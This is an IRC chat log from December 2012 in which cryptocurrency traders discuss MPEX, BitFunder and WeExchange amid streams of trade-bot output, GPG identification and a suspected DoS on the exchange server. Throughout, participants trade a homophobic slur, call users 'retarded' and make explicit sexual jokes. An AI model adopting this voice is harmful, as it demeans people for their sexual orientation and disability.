[S.DICE] 1150 @ 0.0037 = 4.255 BTC [+] Dec 17 23:03:36 no need to get all hysterical about it mircea Dec 17 23:04:46 [MPEX] [S.MPOE] 4321 @ 0.00063225 = 2.732 BTC [+] Dec 17 23:04:47 [MPEX] [S.MPOE] 2595 @ 0.00063252 = 1.6414 BTC [+] Dec 17 23:04:48 [MPEX] [S.MPOE] 19250 @ 0.00063307 = 12.1866 BTC [+] Dec 17 23:04:52 but this IS funny http://www.reddit.com/user/inhibitor23 ( guess it's the joker who made the reddit post) Dec 17 23:06:49 haha so he was the one who suggested installing pimpex on server Dec 17 23:07:25 EskimoBob srsly ? here i sit on a humongous pile of bitcoins and you think you'll somehow manage to engage me in random interwebs dickery ? as if we're both equals, ramen fed nobodies floating abot ? Dec 17 23:07:30 that plan has the flaw in it. Dec 17 23:08:12 dont be egocentric mircea, You are not THE bitcoinman Dec 17 23:08:38 for 1 you cant look into another ones wqallet Dec 17 23:09:09 depends whose. rich people show each other's wallets all the time. Dec 17 23:09:16 it's like a faggotry substitute (no homo) Dec 17 23:10:43 old guys walk aroubd shameless in locker rooms all the time Dec 17 23:11:15 lol Dec 17 23:11:43 ok I drive a nice car thats what I care about Dec 17 23:11:52 and have Bitcoins :D Dec 17 23:13:21 btw most among us have more than enough bitcoins (and other assets/money) otherwise we could not sit around on IRC more than 8 hours a day Dec 17 23:13:28 oil is so last century Dec 17 23:13:40 well i am at worj Dec 17 23:13:50 im pretty broke atm cause of usago Dec 17 23:13:51 ^ Dec 17 23:13:52 usagi Dec 17 23:14:04 so i have to work :p Dec 17 23:14:17 work 8-10 hours a day, bitcoin related 8-10 hours a day hmmn when does a man sleep Dec 17 23:14:33 when his gf demands Dec 17 23:14:36 at night? Dec 17 23:14:46 i dont have a wife or gf so it helps Dec 17 23:14:49 :D Dec 17 23:15:11 i hope btc will free me up financially to quit my job Dec 17 23:15:18 I have, can give you some good headaches overtime Dec 17 23:15:46 meh. Dec 17 23:15:50 I still got a lot of ¨old¨ coins mined in 2010 Dec 17 23:16:04 kids, you need to know how to build things that *work* first Dec 17 23:16:21 jurov: preach it brother Dec 17 23:16:26 I have a kid, so i know 1 thing that works Dec 17 23:16:41 jurov: coinbr is very solid Dec 17 23:16:46 so you preach it Dec 17 23:16:55 its all tested and shit Dec 17 23:16:56 yea, i couldn't fathom putting out fires every time new asset is listed like someone Dec 17 23:17:06 throws pretty excpeptions Dec 17 23:17:06 can I have a Haleluja Dec 17 23:17:38 better throsing exception than acception a fractional number for a quantity Dec 17 23:17:47 heh Dec 17 23:17:47 or even , god save us, negative one Dec 17 23:17:52 btw nice asset/passthrough you brought up on BitFunder jurov Dec 17 23:18:36 ukto is a nice boy, it was worth it figuring something out Dec 17 23:19:16 heh Dec 17 23:21:02 I makes it more of an exchange, now you have mining, sdice and mpoe on Bitfunder Dec 17 23:21:45 sure it will get more trading volume overtime Dec 17 23:22:12 0,o Dec 17 23:22:35 yes Ukto, BitFunder will grow Dec 17 23:23:02 china will grow larger! Dec 17 23:23:31 hahahah Dec 17 23:23:45 China is mass populated already Dec 17 23:23:48 it will? Dec 17 23:23:51 mebbe i should shut it down now Dec 17 23:23:52 :P Dec 17 23:24:04 it is growing ;) Dec 17 23:24:32 not trading 1mil btc/mo yet Dec 17 23:24:38 shut it now when you still can.. when it grows sentient, nobody will be able to! Dec 17 23:24:40 [MPEX] [S.MPOE] 4321 @ 0.00063219 = 2.7317 BTC [-] Dec 17 23:24:41 [MPEX] [S.MPOE] 1729 @ 0.00063228 = 1.0932 BTC [+] Dec 17 23:25:11 mpex is already sentient and we all see where it ends Dec 17 23:25:42 probably it grows tentacles Dec 17 23:25:45 10 tacles. Dec 17 23:25:58 only 10? :/ Dec 17 23:26:04 doesnt sound ver menacing Dec 17 23:26:15 1 for asshole, 1 for mouthole, 1 for urethrahole 1 for earhole Dec 17 23:26:15 etc Dec 17 23:26:19 you need tenticals with sub-tentical spikes Dec 17 23:26:51 [MPEX] [S.MPOE] 16850 @ 0.00063228 = 10.6539 BTC [+] Dec 17 23:27:20 indeed. mpex is the Beast they have prophesied Dec 17 23:27:26 no vagoohole? Dec 17 23:27:53 ETC!!1 Dec 17 23:28:15 maybe you have pic of it in some dark corner of /dtng/ Dec 17 23:28:16 tentacles with barbs Dec 17 23:28:20 to use correct terms back and front bum Dec 17 23:28:21 do show us Dec 17 23:28:44 also debating a horrid idea Dec 17 23:28:47 of adding ltc/nmc to weexchange Dec 17 23:28:55 noooooooooooooo Dec 17 23:28:59 no altcoins Dec 17 23:29:25 when does the hurting stop Dec 17 23:29:29 lol Dec 17 23:29:34 what are the chances that there is a better coin than bitcoin that we haven't heard of yet Dec 17 23:29:34 jesus i agree with PsychoticBoy Dec 17 23:29:38 i digure I can layer on like 50 altchains Dec 17 23:29:42 figure Dec 17 23:29:44 devcoin Dec 17 23:29:45 colored coins Dec 17 23:29:50 sc, sc2 Dec 17 23:29:53 beercoins Dec 17 23:29:56 alt coins are scams Dec 17 23:29:57 SLL Dec 17 23:29:57 http://www.cardsagainsthumanity.com/holidaystats/ Dec 17 23:30:00 :P Dec 17 23:30:07 Ukto, don't forget to make it as ugly as vircurex was.. I miss it Dec 17 23:30:09 they gave away "pay what you can" cards a few weeks ago Dec 17 23:30:10 jarpiain jchysk jcpham jok jurov JWU42 JWU_42_ Dec 17 23:30:14 jcpham http://polimedia.us/dtng/c/res/1018.html there, lose yourself. Dec 17 23:30:21 wat about peepee coin Dec 17 23:30:36 badonkacoin Dec 17 23:30:39 did i just see shitting dick nipples Dec 17 23:30:48 whatwasseencoin Dec 17 23:30:57 I make my own bitcoin fork called PsychoCoin, 5 min a block, 50 coins and a difficulty change every week Dec 17 23:30:58 SDN in the hizzy Dec 17 23:31:08 SDN is next level Dec 17 23:31:15 i'll need a drink first Dec 17 23:31:45 what is sdn ? dare i ask ? Dec 17 23:32:06 ;;google "shitting dpples" Dec 17 23:32:07 David lo - YouTube: ; deviantART: More Like A Brighter Outward Perspective by ~vseira: Dec 17 23:32:10 mircea_popescu: when you pull that usb key out of your ass, where you keep that "big pile of bitcoins" you sit on, sell half a coin and go get yourself something nice. You know, it's this time of the year. ;) Dec 17 23:32:16 damn i screwed it up Dec 17 23:32:26 LOL % of chart that looks like pac-man Dec 17 23:32:27 keyboard is fail Dec 17 23:34:23 [MPEX] [S.MPOE] 4321 @ 0.00063074 = 2.7254 BTC [-] Dec 17 23:34:24 [MPEX] [S.MPOE] 7529 @ 0.0006306 = 4.7478 BTC [-] Dec 17 23:34:25 PP coin, proof of stake crappy coin Dec 17 23:34:42 "wikipedia is very important to us because without it we would not have known the exact volume of a dose of fresh boar sperm" ... cant we do without that? Dec 17 23:34:51 forget all altcoin, there is only 1 coin, Bitcoin Dec 17 23:35:01 ukto those guys are foul Dec 17 23:35:11 if when ordering you put in 0 dollars Dec 17 23:35:17 they told you to go fuck yourself Dec 17 23:35:30 on teh donation check Dec 17 23:35:31 to wiki Dec 17 23:36:23 the command says "for telling us how much boar sperm costs Dec 17 23:36:30 comment Dec 17 23:36:57 the term "boar sperm" conjures up images Dec 17 23:37:00 important information Dec 17 23:37:19 could you imagine.. working some place, accepting donation payments Dec 17 23:37:20 to boar sperm dealer. Dec 17 23:37:34 opening an envelope that says for providing the price of boar sperm? Dec 17 23:37:35 :P Dec 17 23:37:37 livestock sperm management is something important to all of us Dec 17 23:37:46 and is srs fucking bzns Dec 17 23:37:58 you have no idea Dec 17 23:38:05 every sperm is in fact sacred Dec 17 23:38:13 like mine Dec 17 23:38:18 is this luke? Dec 17 23:38:19 [MPEX] [S.MPOE] 4321 @ 0.00063211 = 2.7313 BTC [+] Dec 17 23:38:20 [MPEX] [S.MPOE] 10435 @ 0.00063228 = 6.5978 BTC [+] Dec 17 23:38:27 or is it dog? Dec 17 23:38:33 my uncle is a champion inseminator Dec 17 23:38:34 yes, this is dog. Dec 17 23:38:43 the tech in that industry is fucking crazy Dec 17 23:39:02 can he inseminate PsychoticBoy? Dec 17 23:39:03 :P Dec 17 23:39:08 lol Dec 17 23:39:15 in my ass? Dec 17 23:39:17 wow Dec 17 23:39:22 [MPEX] [S.MPOE] 1686 @ 0.00063228 = 1.066 BTC [+] Dec 17 23:39:22 'but thought better of it Dec 17 23:39:22 :P Dec 17 23:39:22 [MPEX] [S.MPOE] 1064 @ 0.00063307 = 0.6736 BTC [+] Dec 17 23:39:23 [MPEX] [S.MPOE] 1650 @ 0.0006336 = 1.0454 BTC [+] Dec 17 23:39:31 and decieded to use it as a comment instead Dec 17 23:39:35 every dose of jizz is tracked, gpsed, monitored for temp, consistency, flavour etc Dec 17 23:39:45 flavour? Dec 17 23:39:51 well yeah Dec 17 23:39:54 gotta taste test it Dec 17 23:39:56 xtra flavour Dec 17 23:40:07 ok not flavour Dec 17 23:40:18 boar sperm tastes like bacon Dec 17 23:40:22 mircea_popescu seems like folks here need jizz futures on mpex, how about it Dec 17 23:40:32 http://mpex.co/?mpsic=X.BSPRM Dec 17 23:40:39 lol Dec 17 23:41:15 show the people some pics mircea Dec 17 23:41:22 jizz trading is one of the oldest markets Dec 17 23:41:24 coming right after K.KBRL Dec 17 23:41:55 and not just in the way you're thinking Dec 17 23:42:07 hmmmn Dec 17 23:42:34 haha jurov Dec 17 23:43:40 yeah jizz future, that could be the first future with physical delivery on mpex Dec 17 23:43:47 lol Dec 17 23:43:54 straing in the vagoo. Dec 17 23:44:00 straingt Dec 17 23:44:03 fuck Dec 17 23:44:04 certainly an untapped resource from bitcointalk Dec 17 23:44:07 straight. Dec 17 23:44:08 count me in Dec 17 23:44:20 new subforum Dec 17 23:44:29 you have an existing market of furious masturbators Dec 17 23:45:04 milk producers Dec 17 23:47:00 < thestringpuller> smickles: how long will you ve offering the lending deal on S.DICE <<< I haven't put a time limit on it Dec 17 23:47:28 smickles, and do you provide an api? my bot is interested Dec 17 23:48:09 lol Dec 17 23:48:46 seriously. poor thing, finds itself in the wrong end of the book, bitching and moaning Dec 17 23:49:05 if it could just short trade all would be jolly Dec 17 23:49:11 an mpex bot? Dec 17 23:49:15 < mircea_popescu> so basically "o, can i short it ???" "yes, smickles lends shares" "but can i short it without going into mpex". << http://www.reddit.com/r/Bitcoin/comments/14zxqr/mpex_over_1_million_btc_total_market_cap/c7i5djd Dec 17 23:49:46 !ticker S.MPOE Dec 17 23:49:48 [MPEX:S.MPOE] 1day: 0.0006088 / 0.00062639 / 0.0006361 (2557080 shares, 1,601.75 BTC), 30day: 0.00049308 / 0.0005322 / 0.00063995 (100725071 shares, 53,606.21 BTC) Dec 17 23:49:49 thestringpuller, don't tell me you did not notice its tracks in this very thread Dec 17 23:51:09 jurov: I'm not even working on an api yet. Are you serious? Dec 17 23:52:55 half serious... while i can lend to the bot myself, it trades small amounts Dec 17 23:52:58 [MPEX] [S.MPOE] 4321 @ 0.00063089 = 2.7261 BTC [-] Dec 17 23:53:00 [MPEX] [S.MPOE] 4671 @ 0.0006306 = 2.9455 BTC [-] Dec 17 23:53:01 [MPEX] [S.MPOE] 14066 @ 0.0006265 = 8.8123 BTC [-] Dec 17 23:53:06 but it could be interesting elsewhere Dec 17 23:53:43 its good for grinding shares on mpoe i suppose Dec 17 23:53:54 auto day trading Dec 17 23:54:30 jurov: i'm working on a options market maker right now. after that, i'll look into an automated share lender Dec 17 23:55:41 okay Dec 17 23:55:54 ;;gpg info Dec 17 23:55:54 (gpg info [--key|--address] ) -- Returns the registration details of registered user . If '--key' option is given, interpret as a GPG key ID. Dec 17 23:56:04 ;;gpg info --address smickles Dec 17 23:56:06 No such user registered. Dec 17 23:56:12 lolwut? Dec 17 23:56:24 oh Dec 17 23:56:34 ;;gpg info smkickles Dec 17 23:56:35 No such user registered. Dec 17 23:56:39 bah! Dec 17 23:56:46 ;;gpg info sickles Dec 17 23:56:46 No such user registered. Dec 17 23:57:01 oh god damn, i'm taking this fail to a /q Dec 17 23:57:04 HA HA HA HA Dec 17 23:57:08 HOW ARE YOU GENTLEMEN Dec 17 23:57:11 [MPEX] [S.MPOE] 4321 @ 0.00062674 = 2.7081 BTC [+] Dec 17 23:57:13 [MPEX] [S.MPOE] 2179 @ 0.0006265 = 1.3651 BTC [-] Dec 18 00:01:06 boar sperm is sorta like sperm whale ? Dec 18 00:01:46 no Dec 18 00:02:09 boar sperm is why we eat bacon, sperm whale is why the sea is salty Dec 18 00:02:52 o i c Dec 18 00:02:55 no homo ? Dec 18 00:06:40 yeah, pig is porcus in latin, not homo Dec 18 00:07:50 ;D Dec 18 00:08:52 denti be teeth ? Dec 18 00:09:17 dub i asked and cum isn't salty. Dec 18 00:09:21 whatever you been eating ? Dec 18 00:09:21 [MPEX] [S.MPOE] 4321 @ 0.00063332 = 2.7366 BTC [+] Dec 18 00:09:22 [MPEX] [S.MPOE] 16600 @ 0.0006336 = 10.5178 BTC [+] Dec 18 00:09:23 [MPEX] [S.MPOE] 6602 @ 0.00063463 = 4.1898 BTC [+] Dec 18 00:10:20 it's a widespread myth that cum is salty, iirc Dec 18 00:11:01 yeah I'll admit to not having first hand knowledge ehre Dec 18 00:16:57 [MPEX] [S.MPOE] 4321 @ 0.00063431 = 2.7409 BTC [-] Dec 18 00:16:59 [MPEX] [S.MPOE] 14602 @ 0.00063463 = 9.2669 BTC [+] Dec 18 00:18:29 [MPEX] [S.MPOE] 6946 @ 0.00063463 = 4.4081 BTC [+] Dec 18 00:18:30 [MPEX] [S.MPOE] 6300 @ 0.00063531 = 4.0025 BTC [+] Dec 18 00:18:31 [MPEX] [S.MPOE] 2000 @ 0.0006361 = 1.2722 BTC [+] Dec 18 00:18:32 [MPEX] [S.MPOE] 9732 @ 0.00063617 = 6.1912 BTC [+] Dec 18 00:26:06 dub you should get a taste then ;) Dec 18 00:28:08 I spend a considerable amount of time in the sea, we can just pretend teh myth is true Dec 18 00:29:23 ;;ticker Dec 18 00:29:24 BTCUSD ticker | Best bid: 13.29000, Best ask: 13.29001, Bid-ask spread: 0.00001, Last trade: 13.29000, 24 hour volume: 72257.80506675, 24 hour low: 12.74919, 24 hour high: 13.48500, 24 hour vwap: 13.19301 Dec 18 00:29:35 pretty heavy volume for very little movement. Dec 18 00:33:07 thats a decent dip no? Dec 18 00:35:13 coupla % ? not really much Dec 18 00:37:23 and with that i bid you all a very good bowl of punch. **** BEGIN LOGGING AT Tue Dec 18 08:20:27 2012 Dec 18 08:20:43 -NickServ- You failed to identify in time for the nickname mircea_popescu **** ENDING LOGGING AT Tue Dec 18 08:22:12 2012 **** BEGIN LOGGING AT Tue Dec 18 08:22:54 2012 Dec 18 08:23:02 !ticker s.dice Dec 18 08:23:04 [MPEX:S.DICE] 1day: 0.0018 / 0.00359628 / 0.0037 (877988 shares, 3,157.49 BTC), 30day: 0.0018 / 0.00340582 / 0.0037 (6489978 shares, 22,103.71 BTC) Dec 18 08:24:09 mircea_popescu: you missed my redux of a cause de garcsons Dec 18 08:24:21 o ? Dec 18 08:25:05 dja mean des garcons ? Dec 18 08:26:00 as in acausedesgarcons.com/ - Le blog gay des beaux garçons qui se mettent à nu ? Dec 18 08:26:40 lol, you expect me to be able to spell french words? we're talking about me here :D Dec 18 08:27:26 hehe Dec 18 08:29:03 quite funny readding that reddit about mpex. Dec 18 08:29:16 i get this feeling as if for many people bitcoin is pretty much the wtf gift that keeps on giving Dec 18 08:31:45 well, i think that has to do with the fact that it's not 'established' yet Dec 18 08:31:59 that establishment prolly having a lot to do with the volatility Dec 18 08:32:29 hey! ya wanna know what my volatility mistake was earlier? Dec 18 08:32:46 well, i wrote all the code myself, based off of theory Dec 18 08:33:03 turns out i coded it for variance, not volatility! Dec 18 08:33:04 lol Dec 18 08:33:36 a simple change in input for sigma to sigma² fixed it Dec 18 08:38:12 [MPEX] [S.MPOE] 28145 @ 0.00063171 = 17.7795 BTC [-] Dec 18 08:53:23 ahaha Dec 18 08:53:35 this is cute Dec 18 08:53:56 so with the new inputs the differences from mpoe reduced or amplified ? Dec 18 08:56:55 [MPEX] [O.BTCUSD.P130T] 1000 @ 0.07713857 = 77.1386 BTC [-] Dec 18 08:56:59 [MPEX] [O.BTCUSD.P140T] 1000 @ 0.11328195 = 113.282 BTC [-] Dec 18 08:57:04 [MPEX] [O.BTCUSD.P150T] 1000 @ 0.15615809 = 156.1581 BTC [+] Dec 18 09:03:10 hey mircea_popescu Dec 18 09:03:19 hey ukto Dec 18 09:03:28 whats the proper term.. for letting people "over bid" ? place total bids for more money/btc then they have ? Dec 18 09:03:44 I cant think of how to term it for some reason Dec 18 09:03:49 margining them Dec 18 09:03:53 ah Dec 18 09:03:55 there we go Dec 18 09:04:05 it's nothing you should do w/o adequate capital on hand. Dec 18 09:04:14 Sigh, most people wont understand the question Dec 18 09:04:31 i'll have to spell out the question on the faq Dec 18 09:05:19 Q: Can I put up more total bids than BTC/Shares available? (Margining) Dec 18 09:05:25 That sound reasonable? Dec 18 09:06:08 you're going to seamlessly margin shares ? Dec 18 09:06:36 the answer is NO Dec 18 09:06:49 just trying to write the question is a format the even dumb ppl can understand Dec 18 09:07:23 ahahah Dec 18 09:07:26 Do you offer margin ? Dec 18 09:07:27 No. Dec 18 09:07:46 yeah, then you get ppl who wont undertsand it and still ask if they can overbid Dec 18 09:07:48 :P Dec 18 09:07:58 Remember, BF has the retard users too Dec 18 09:08:04 :P Dec 18 09:08:15 or expect them Dec 18 09:08:16 to Dec 18 09:08:46 Q: Can I put up bids adding up to more BTC than I have ? Can I sell shares I do not own ? Dec 18 09:08:48 No. Dec 18 09:09:08 This should go right after Dec 18 09:09:19 Q. Is 1+3=4 ? Dec 18 09:09:23 A. For most values of 4. Dec 18 09:09:28 :P Dec 18 09:10:39 kk, i got it covered Dec 18 09:10:41 ready for this? :P Dec 18 09:10:53 Q: Does the site allow Margining? Dec 18 09:10:53 A: No. Every bid reserves the total amount in either BTC or shares for that asset. Dec 18 09:10:53 Q: Can I put up more total bids than BTC/Shares available (Margining)? Dec 18 09:10:53 A: No. Every bid reserves the total amount in either BTC or shares for that asset. Dec 18 09:10:53 Q: Can I place bids/asks adding up to more BTC/Shares than I have? Dec 18 09:10:54 *crickets* Dec 18 09:10:54 A: No. Every bid reserves the total amount in either BTC or shares for that asset. Dec 18 09:11:05 I don't think it will be missed. :P Dec 18 09:11:07 lol Dec 18 09:11:26 If you are going to cater to retarded people, speak their language Dec 18 09:11:31 in as many forms as possible Dec 18 09:14:13 https://bitcointalk.org/index.php?topic=130117.msg1406452#msg1406452 if you didn't see it Dec 18 09:15:53 yeah Dec 18 09:15:57 thats what I am working through Dec 18 09:16:01 alomst done with teh list Dec 18 09:16:02 :P Dec 18 09:16:21 about to post and let em know his wishes have been granted Dec 18 09:16:52 wasnt trying to call him dumb with teh faq questions Dec 18 09:16:55 was putting that in for others tho Dec 18 09:16:58 so i wont be missed Dec 18 09:17:07 for my curiosity, why are you keeping weex and bf separate ? Dec 18 09:17:26 doesn't it add to the overhead for everyone ? Dec 18 09:17:50 in other news, the forum delivers : "I destroyed my credit before i was 20. I need a fresh start. Bankruptcy attorneys in my area are telling me $800 for their service. I know i can do it myself for under $100 but i dont know what im doing." Dec 18 09:21:13 LOL Dec 18 09:45:07 [MPEX] [O.BTCUSD.P150T] 1000 @ 0.15599534 = 155.9953 BTC [-] Dec 18 09:45:13 [MPEX] [O.BTCUSD.P140T] 1000 @ 0.11311101 = 113.111 BTC [-] Dec 18 09:45:18 [MPEX] [O.BTCUSD.P130T] 1000 @ 0.07697019 = 76.9702 BTC [-] Dec 18 09:45:51 [MPEX] [O.BTCUSD.C120T] 5 @ 0.17254855 = 0.8627 BTC [+] Dec 18 09:45:52 [MPEX] [O.BTCUSD.C120T] 495 @ 0.18305995 = 90.6147 BTC [+] Dec 18 09:49:41 [MPEX] [S.MPOE] 16150 @ 0.00063171 = 10.2021 BTC [-] Dec 18 09:51:23 [MPEX] [S.MPOE] 4321 @ 0.00062847 = 2.7156 BTC [-] Dec 18 09:51:24 [MPEX] [S.MPOE] 462 @ 0.00062842 = 0.2903 BTC [-] Dec 18 09:51:25 https://bitcointalk.org/index.php?topic=130117.msg1406815#msg1406815 <-- Requests answered Dec 18 09:51:43 Now.. to do jimmys request Dec 18 09:55:46 [MPEX] [S.MPOE] 4321 @ 0.00063149 = 2.7287 BTC [+] Dec 18 09:55:48 [MPEX] [S.MPOE] 4990 @ 0.00063171 = 3.1522 BTC [+] Dec 18 09:55:49 [MPEX] [S.MPOE] 1639 @ 0.00063658 = 1.0434 BTC [+] Dec 18 10:20:33 [MPEX] [S.MPOE] 4321 @ 0.00062871 = 2.7167 BTC [-] Dec 18 10:20:34 [MPEX] [S.MPOE] 12750 @ 0.00062842 = 8.0124 BTC [-] Dec 18 10:20:35 [MPEX] [S.MPOE] 1550 @ 0.00062523 = 0.9691 BTC [-] Dec 18 10:20:37 [MPEX] [S.MPOE] 2729 @ 0.0006216 = 1.6963 BTC [-] Dec 18 10:54:38 mircea_popescu: mpex says it doesn't recognize my signature Dec 18 10:55:00 are you using old verion of pympex ? Dec 18 10:55:33 yeah, but I just tried issuing a stat manually, and it failed Dec 18 10:55:43 hum Dec 18 10:55:51 replace Dec 18 10:55:52 self.mpex_url = 'http://polimedia.us/bitcoin/mpex.php' Dec 18 10:55:54 with Dec 18 10:55:58 self.mpex_url = 'http://mpex.co' Dec 18 10:56:05 or else get the new version (does the same thing) Dec 18 10:56:07 and let me know Dec 18 10:56:15 ok I"ll try Dec 18 10:59:01 Hey mircea Dec 18 10:59:23 What do you think of this? http://www.namworld.net/portfolio/bitvps.com/ Dec 18 11:02:31 looks pretty slick Dec 18 11:05:32 Thanks. Trying hard. For now everyone else at BitVPS says http://wallet.bitvps.com/ is better. Dec 18 11:06:42 I'll still finish this one. Might take ~1 week of work. Hopefully it will get better. Dec 18 11:06:53 Otherwise I'm sure I'll find a taker for the template. Dec 18 11:07:31 bulding stuff is how btc goes up, i'll tell you that. Dec 18 11:08:34 mircea_popescu: I changed mpex_url, now it hangs when I run it. I tried issuing an order by following section 6 of the FAQ and pasted the clear signed message directly via the web interface, and it replies with "Unrecognized signature. Please email your public key first." Dec 18 11:09:06 ok this is weird. Dec 18 11:09:10 ;;ident maximian Dec 18 11:09:11 Nick 'maximian', with hostmask 'maximian!~maximian@S01062cb05d389a4b.vc.shawcable.net', is not identified. Dec 18 11:09:24 please ident or else send me an email signed with the respective key Dec 18 11:09:43 how do I ident? Dec 18 11:10:51 ;;eauth with gribble Dec 18 11:11:14 could I just send you the clear signed STAT command I issued? Dec 18 11:11:31 ;;eauth Dec 18 11:11:32 hm. listen, but you're not supposed to paste clearsigned stuff in there Dec 18 11:11:36 (eauth ) -- Initiate authentication for user . You must have registered a GPG key with the bot for this to work. You will be given a link to a page which contains a one time password encrypted with your key. Decrypt, and use the 'everify' command with it. Your passphrase will expire in 10 minutes. Dec 18 11:11:43 I didn't Dec 18 11:11:45 you're supposed to clearsign it first, and then encrypt it with the exchange's key Dec 18 11:11:45 a ok Dec 18 11:11:58 yep, I pasted the encrypted version Dec 18 11:12:01 kk Dec 18 11:12:19 email me somethign signed so i actually know it's you. Dec 18 11:12:22 safety measure. Dec 18 11:12:38 email addy? Dec 18 11:14:13 http://trilema.com/wp-content/uploads/office.jpg Dec 18 11:16:41 [MPEX] [S.DICE] 1700 @ 0.00368608 = 6.2663 BTC [+] Dec 18 11:16:42 [MPEX] [S.DICE] 4277 @ 0.00368848 = 15.7756 BTC [+] Dec 18 11:16:44 [MPEX] [S.DICE] 20023 @ 0.003699 = 74.0651 BTC [+] Dec 18 11:16:55 if anyone's curious, http://trilema.com/2012/mpoe-bonds-historical-data/ Dec 18 11:17:08 mircea_popescu: sent Dec 18 11:35:07 maximian are you getting pms ? Dec 18 11:36:25 sorry, was afk Dec 18 11:36:28 [MPEX] [S.DICE] 50000 @ 0.003699 = 184.95 BTC [+] Dec 18 11:36:31 a np Dec 18 11:38:00 ;;ident dub Dec 18 11:38:00 Nick 'dub', with hostmask 'dub!dub@unaffiliated/dub', is identified as user dub, with GPG key id 110C3582E5C480CF, key fingerprint B2956C98270DCC89E2E94A17110C3582E5C480CF, and bitcoin address None Dec 18 11:38:04 wowow Dec 18 11:38:59 ? Dec 18 11:40:08 I got around to registering Dec 18 11:40:56 [MPEX] [S.MPOE] 3300 @ 0.00062771 = 2.0714 BTC [+] Dec 18 11:40:58 [MPEX] [S.MPOE] 4321 @ 0.00062164 = 2.6861 BTC [-] Dec 18 11:40:59 [MPEX] [S.MPOE] 6158 @ 0.0006216 = 3.8278 BTC [-] Dec 18 11:40:59 [MPEX] [S.MPOE] 6171 @ 0.00061923 = 3.8213 BTC [-] Dec 18 11:41:09 wd. Dec 18 11:50:05 http://www.namworld.net/portfolio/bitvps.com/vps Dec 18 11:50:30 clickable servers with specs inscribed for ordering Dec 18 11:50:44 I still need to make the specs styling. Dec 18 11:50:53 [MPEX] [S.MPOE] 5284 @ 0.00061923 = 3.272 BTC [-] Dec 18 11:50:54 [MPEX] [S.MPOE] 28766 @ 0.00061649 = 17.734 BTC [-] Dec 18 12:42:14 [MPEX] [S.MPOE] 15603 @ 0.00063186 = 9.8589 BTC [+] Dec 18 12:42:14 [MPEX] [S.MPOE] 3047 @ 0.00061649 = 1.8784 BTC [-] Dec 18 13:03:08 Ukto: ping Dec 18 13:03:44 Pong! Dec 18 13:03:46 :) Dec 18 13:05:05 is mpex slow for anyone ? Dec 18 13:10:19 stop reloading that portn page mircea_popescu and it will speed up the rest Dec 18 13:10:20 :) Dec 18 13:10:57 no, actually, i think some scriptkiddie is trying his version of a dos. the server's been doing 1-1.5Gbps for the past hour Dec 18 13:11:03 doesn't seem to be doing anything tho Dec 18 13:11:54 tail and/or grep the logs and see Dec 18 13:13:54 did anyone receive the updated lists from James last night? Dec 18 13:14:35 too early to ask that probably, most are still sleeping over there Dec 18 13:20:38 [MPEX] [S.MPOE] 9900 @ 0.00063302 = 6.2669 BTC [+] Dec 18 13:20:39 [MPEX] [S.MPOE] 4321 @ 0.00063657 = 2.7506 BTC [+] Dec 18 13:20:40 [MPEX] [S.MPOE] 7145 @ 0.00063658 = 4.5484 BTC [+] Dec 18 13:28:51 burnside: there? Dec 18 13:29:26 A friend on skype msgd me saying he got a claim email, logged into the 'trash' account, withdrew, and ended up with a ?-0.000195 balance. Dec 18 13:29:53 looks like the now 'free withdraws' is charging accounts the bitcoin transaction fee. Dec 18 13:32:43 [MPEX] [S.DICE] 40000 @ 0.003699 = 147.96 BTC [+] Dec 18 13:35:41 mod6 maybe it's worth having a chat with http://play.google.com/store/apps/details?id=de.schildbach.wallet Dec 18 13:35:53 they probably have some working encryption Dec 18 13:37:19 [MPEX] [X.INKG] 244 @ 0.06858952 = 16.7358 BTC [-] Dec 18 13:40:14 [MPEX] [S.MPOE] 4321 @ 0.00061651 = 2.6639 BTC [-] Dec 18 13:40:15 [MPEX] [S.MPOE] 20483 @ 0.00061649 = 12.6276 BTC [-] Dec 18 13:40:17 [MPEX] [S.MPOE] 16850 @ 0.00061612 = 10.3816 BTC [-] Dec 18 13:40:18 [MPEX] [S.MPOE] 30003 @ 0.00061502 = 18.4524 BTC [-] Dec 18 13:40:19 [MPEX] [S.MPOE] 14650 @ 0.00061483 = 9.0073 BTC [-] Dec 18 13:40:19 [MPEX] [S.MPOE] 14000 @ 0.00061242 = 8.5739 BTC [-] Dec 18 13:40:20 [MPEX] [S.MPOE] 1572 @ 0.00061132 = 0.961 BTC [-] Dec 18 13:40:21 [MPEX] [S.MPOE] 13500 @ 0.00061129 = 8.2524 BTC [-] Dec 18 13:40:22 [MPEX] [S.MPOE] 11000 @ 0.00061086 = 6.7195 BTC [-] Dec 18 13:40:24 [MPEX] [S.MPOE] 7098 @ 0.00061056 = 4.3338 BTC [-] Dec 18 13:40:25 [MPEX] [S.MPOE] 2700 @ 0.00061011 = 1.6473 BTC [-] Dec 18 13:40:26 [MPEX] [S.MPOE] 12118 @ 0.00061003 = 7.3923 BTC [-] Dec 18 13:40:27 [MPEX] [S.MPOE] 33400 @ 0.00060983 = 20.3683 BTC [-] Dec 18 13:40:28 [MPEX] [S.MPOE] 12850 @ 0.00060981 = 7.8361 BTC [-] Dec 18 13:40:28 [MPEX] [S.MPOE] 36978 @ 0.00060942 = 22.5351 BTC [-] Dec 18 13:40:30 [MPEX] [S.MPOE] 22350 @ 0.00060923 = 13.6163 BTC [-] Dec 18 13:40:30 [MPEX] [S.MPOE] 8140 @ 0.00060923 = 4.9591 BTC [-] Dec 18 13:40:31 [MPEX] [S.MPOE] 1391 @ 0.00060908 = 0.8472 BTC [-] Dec 18 13:40:32 [MPEX] [S.MPOE] 17079 @ 0.00060901 = 10.4013 BTC [-] Dec 18 13:40:33 [MPEX] [S.MPOE] 90312 @ 0.000609 = 55 BTC [-] Dec 18 13:40:34 [MPEX] [S.MPOE] 10760 @ 0.0006088 = 6.5507 BTC [-] Dec 18 13:40:35 [MPEX] [S.MPOE] 30457 @ 0.00060872 = 18.5398 BTC [-] Dec 18 13:40:36 [MPEX] [S.MPOE] 2015 @ 0.00060866 = 1.2264 BTC [-] Dec 18 13:40:38 [MPEX] [S.MPOE] 22317 @ 0.00060852 = 13.5803 BTC [-] Dec 18 13:40:39 [MPEX] [S.MPOE] 21400 @ 0.00060846 = 13.021 BTC [-] Dec 18 13:40:40 [MPEX] [S.MPOE] 7071 @ 0.00060833 = 4.3015 BTC [-] Dec 18 13:40:40 [MPEX] [S.MPOE] 1000 @ 0.00060833 = 0.6083 BTC [-] Dec 18 13:40:41 [MPEX] [S.MPOE] 14882 @ 0.00060832 = 9.053 BTC [-] Dec 18 13:40:42 [MPEX] [S.MPOE] 27000 @ 0.00060826 = 16.423 BTC [-] Dec 18 13:40:43 [MPEX] 